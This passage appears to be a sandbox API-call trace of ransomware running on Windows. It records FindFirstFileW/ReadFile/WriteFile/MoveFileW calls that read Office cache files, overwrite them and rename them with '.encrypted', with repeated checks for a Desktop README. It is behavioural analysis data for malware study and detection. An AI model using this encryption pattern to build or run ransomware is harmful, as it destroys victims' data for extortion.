ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.906] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0197.906] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0197.906] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0197.906] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0197.906] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.906] FindClose (in: hFindFile=0x94f0830 | out: hFindFile=0x94f0830) returned 1 [0197.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0197.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0197.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0197.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0197.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0197.907] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0830 [0197.909] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.909] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0197.909] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0197.909] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0197.909] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0197.910] FindNextFileW (in: hFindFile=0x94f0830, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0197.910] FindClose (in: hFindFile=0x94f0830 | out: hFindFile=0x94f0830) returned 1 [0197.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0197.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0197.911] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpFilePart=0x0) returned 0x48 [0197.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0197.911] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.912] GetFileType (hFile=0x26c) returned 0x1 [0197.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0197.912] GetFileType (hFile=0x26c) returned 0x1 [0197.912] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x1200204 [0197.963] ReadFile (in: hFile=0x26c, lpBuffer=0x31501018, nNumberOfBytesToRead=0x1200204, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x31501018*, lpNumberOfBytesRead=0x2ee7d4*=0x1200204, lpOverlapped=0x0) returned 1 [0199.064] CloseHandle (hObject=0x26c) returned 1 [0205.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0205.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0205.710] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0205.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0205.711] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpFilePart=0x0) returned 0x48 [0205.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0205.711] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0205.712] GetFileType (hFile=0x280) returned 0x1 [0205.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0205.713] GetFileType (hFile=0x280) returned 0x1 [0205.713] WriteFile (in: hFile=0x280, lpBuffer=0x4a21018*, nNumberOfBytesToWrite=0x1200210, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x4a21018*, lpNumberOfBytesWritten=0x2ee7c4*=0x1200210, lpOverlapped=0x0) returned 1 [0206.151] CloseHandle (hObject=0x280) returned 1 [0206.246] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpFilePart=0x0) returned 0x48 [0206.246] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.encrypted", lpFilePart=0x0) returned 0x52 [0206.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0206.246] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x607c3520, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1200210)) returned 1 [0206.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0206.247] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.encrypted")) returned 1 [0206.248] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0206.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0206.248] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.248] GetFileType (hFile=0x280) returned 0x1 [0206.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0206.248] GetFileType (hFile=0x280) returned 0x1 [0206.249] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x4cf [0206.249] ReadFile (in: hFile=0x280, lpBuffer=0x224b150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x224b150*, lpNumberOfBytesRead=0x2ee7d4*=0x4cf, lpOverlapped=0x0) returned 1 [0206.250] CloseHandle (hObject=0x280) returned 1 [0206.296] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0206.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0206.297] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0206.297] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0206.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0206.297] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.298] GetFileType (hFile=0x280) returned 0x1 [0206.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0206.298] GetFileType (hFile=0x280) returned 0x1 [0206.298] WriteFile (in: hFile=0x280, lpBuffer=0x229af20*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x229af20*, lpNumberOfBytesWritten=0x2ee798*=0x4d0, lpOverlapped=0x0) returned 1 [0206.299] CloseHandle (hObject=0x280) returned 1 [0206.299] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0206.299] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.encrypted", lpFilePart=0x0) returned 0x58 [0206.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0206.299] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x60835940, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x4d0)) returned 1 [0206.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0206.299] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.encrypted")) returned 1 [0206.301] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0206.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0206.301] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.301] GetFileType (hFile=0x280) returned 0x1 [0206.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0206.301] GetFileType (hFile=0x280) returned 0x1 [0206.301] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x73c [0206.301] ReadFile (in: hFile=0x280, lpBuffer=0x229c9d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x229c9d4*, lpNumberOfBytesRead=0x2ee7d4*=0x73c, lpOverlapped=0x0) returned 1 [0206.320] CloseHandle (hObject=0x280) returned 1 [0206.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0206.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0206.340] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0206.340] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0206.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0206.340] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.341] GetFileType (hFile=0x280) returned 0x1 [0206.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0206.341] GetFileType (hFile=0x280) returned 0x1 [0206.342] WriteFile (in: hFile=0x280, lpBuffer=0x22ece1c*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22ece1c*, lpNumberOfBytesWritten=0x2ee798*=0x740, lpOverlapped=0x0) returned 1 [0206.343] CloseHandle (hObject=0x280) returned 1 [0206.343] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0206.343] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0206.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0206.343] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x608a7d60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x740)) returned 1 [0206.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0206.343] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0206.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0206.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0206.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0206.345] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, 